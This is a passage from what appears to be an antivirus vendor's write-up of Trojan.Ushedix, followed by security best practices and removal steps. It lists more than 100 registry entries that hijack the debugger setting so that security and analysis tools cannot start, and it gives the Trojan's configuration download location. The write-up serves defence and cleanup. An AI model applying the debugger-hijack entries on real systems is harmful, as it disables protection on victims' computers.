(Trojan.Ushedix) Next, the Trojan creates the following registry entries in order to disable certain security programs: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\avp.com\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\avp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\runiep.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\PFW.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\FYFireWall.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwmain.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwsrv.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAVPF.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KPFW32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\nod32kui.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\nod32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Navapsvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Navapw32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\avconsol.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\webscanx.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\NPFMntor.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\vsstat.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KPfwSvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Ras.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RavMonD.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mmsk.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\WoptiClean.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\QQKav.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\QQDoctor.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EGHOST.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\360Safe.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\iparmo.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\adam.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\360rpt.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\360tray.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AgentSvr.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AppSvc32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\autoruns.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\avgrssvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AvMonitor.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\CCenter.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ccSvcHst.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\FileDsty.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\FTCleanerShell.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HijackThis.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Iparmor.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\isPwdSvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kabaload.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KaScrScn.SCR\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KASMain.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KASTask.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAVDX.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAVPFW.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAVSetup.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAVStart.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KISLnchr.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KMailMon.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KMFilter.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KPFW32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KPFW32X.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KPFWSvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KRegEx.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KRepair.com\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KsLoader.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVCenter.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvDetect.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvfwMcl.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVMonXP.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVMonXP_1.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvol.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvolself.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvReport.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVScan.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVSrvXP.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVStub.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvupload.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvwsc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvXP.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvXP_1.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KWatch.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KWatch9x.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KWatchX.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\MagicSet.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mcconsol.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mmqczj.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAV32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\nod32krn.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\PFWLiveUpdate.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\QHSET.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RavMonD.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RavStub.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RegClean.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwcfg.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RfwMain.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwsrv.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RsAgent.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Rsaupd.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\safelive.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\scan32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\shcfg32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SmartUp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SREng.EXE\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\symlcsvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SysSafe.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\TrojanDetector.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Trojanwall.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\TrojDie.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UIHost.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxAgent.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxAttachment.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxCfg.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxFwHlp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxPol.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UpLive.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\procexp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwstub.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RegTool.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwProxy.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RawCopy.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\CCenter.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\filemon.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\regmon.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AntiArp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\GFUpd.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\GFRing3.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\QQDoctorMain.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SelfUpdate.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Your Image File Name Here without a path\\""Debugger"" = ""ntsd -d"" It then infects the file ser32.dll so that the Trojan is executed every time the file user32.dll is loaded. Note: The infected user32.dll is detected as Trojan.Ushedix!inf . The Trojan downloads a configuration file from the following location: [http://]www.infomt.net/dk.[REMOVED] It then downloads potentially malicious files on to the compromised computer. The Trojan copies the file %System%\\dxdiag.exe to %System%\\NBA.exe and then deletes itself. Recommendations Symantec Security Response encourages all users and administrators to adhere to the following basic security ""best practices"": Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world. Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised. Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application. Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available. Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared. Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack. If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied. Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services. Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files. Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media. Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched. If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to ""Hidden"" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to ""Unauthorized"", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources. For further information on the terms used in this document, please refer to the Security Response glossary. Removal The following instructions pertain to all current and recent Symantec antivirus products, including the Symantec AntiVirus and Norton AntiVirus product lines. Disable System Restore (Windows Me/XP). Update the virus definitions. Run a full system scan. Delete any values added to the registry. Extract and restore Windows files. For specific details on each of these steps, read the following instructions. 1. To disable System Restore (Windows Me/XP) If you are running Windows Me or Windows XP, we recommend that you temporarily turn off System Restore. Windows Me/XP uses this feature, which is enabled by default, to restore the files on your computer in case they become damaged. If a virus, worm, or Trojan infects a computer, System Restore may back up the virus, worm, or Trojan on the computer. Windows prevents outside programs, including antivirus programs, from modifying System Restore. Therefore, antivirus programs or tools cannot remove threats in the System Restore folder. As a result, System Restore has the potential of restoring an infected file on your computer, even after you have cleaned the infected files from all the other locations. Also, a virus scan may detect a threat in the System Restore folder even though you have removed the threat. For instructions on how to turn off System Restore, read your Windows documentation, or one of the following articles: How to disable or enable Windows Me System Restore How to turn off or turn on Windows XP System Restore Note: When you are completely finished with the removal procedure and are satisfied that the threat has been removed, reenable System Restore by following the instructions in the aforementioned documents. For additional information, and an alternative to disabling Windows Me System Restore, see the Microsoft Knowledge Base article: Antivirus Tools Cannot Clean Infected Files in the _Restore Folder (Article ID: Q263455). 2. To update the virus definitions Symantec Security Response fully tests all the virus definitions for quality assurance before they are posted to our servers. There are two ways to obtain the most recent virus definitions: Running LiveUpdate, which is the easiest way to obtain virus definitions. If you use Norton AntiVirus 2006, Symantec AntiVirus Corporate Edition 10.0, or newer products, LiveUpdate definitions are updated daily. These products include newer technology. If you use Norton AntiVirus 2005, Symantec AntiVirus Corporate Edition 9.0, or earlier products, LiveUpdate definitions are updated weekly. The exception is major outbreaks, when definitions are updated more often. Downloading the definitions using the Intelligent Updater: The Intelligent Updater virus definitions are posted daily. You should download the definitions from the Symantec Security Response Web site and manually install them. The latest Intelligent Updater virus definitions can be obtained here: Intelligent Updater virus definitions . For detailed instructions read the document: How to update virus definition files using the Intelligent Updater . 3. To run a full system scan Start your Symantec antivirus program and make sure that it is configured to scan all the files. For Norton AntiVirus consumer products: Read the document: How to configure Norton AntiVirus to scan all files. For Symantec AntiVirus Enterprise products: Read the document: How to verify that a Symantec Corporate antivirus product is set to scan all files. Run a full system scan. If any files are detected, follow the instructions displayed by your antivirus program. Important: If you are unable to start your Symantec antivirus product or the product reports that it cannot delete a detected file, you may need to stop the risk from running in order to remove it. To do this, run the scan in Safe mode. For instructions, read the document, How to start the computer in Safe Mode . Once you have restarted in Safe mode, run the scan again. After the files are deleted, restart the computer in Normal mode and proceed with the next section. Warning messages may be displayed when the computer is restarted, since the threat may not be fully removed at this point. You can ignore these messages and click OK. These messages will not appear when the computer is restarted after the removal instructions have been fully completed. The messages displayed may be similar to the following: Title: [FILE PATH] Message body: Windows cannot find [FILE NAME]. Make sure you typed the name correctly, and then try again. To search for a file, click the Start button, and then click Search. 4. To delete the value from the registry Important: Symantec strongly recommends that you back up the registry before making any changes to it. Incorrect changes to the registry can result in permanent data loss or corrupted files. Modify the specified subkeys only. For instructions refer to the document: How to make a backup of the Windows registry . Click Start > Run. Type regedit Click OK. Note: If the registry editor fails to open the threat may have modified the registry to prevent access to the registry editor. Security Response has developed a tool to resolve this problem. Download and run this tool, and then continue with the removal. Navigate to and delete the following registry entries: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\avp.com\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\avp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\runiep.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\PFW.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\FYFireWall.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwmain.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwsrv.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAVPF.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KPFW32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\nod32kui.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\nod32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Navapsvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Navapw32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\avconsol.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\webscanx.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution 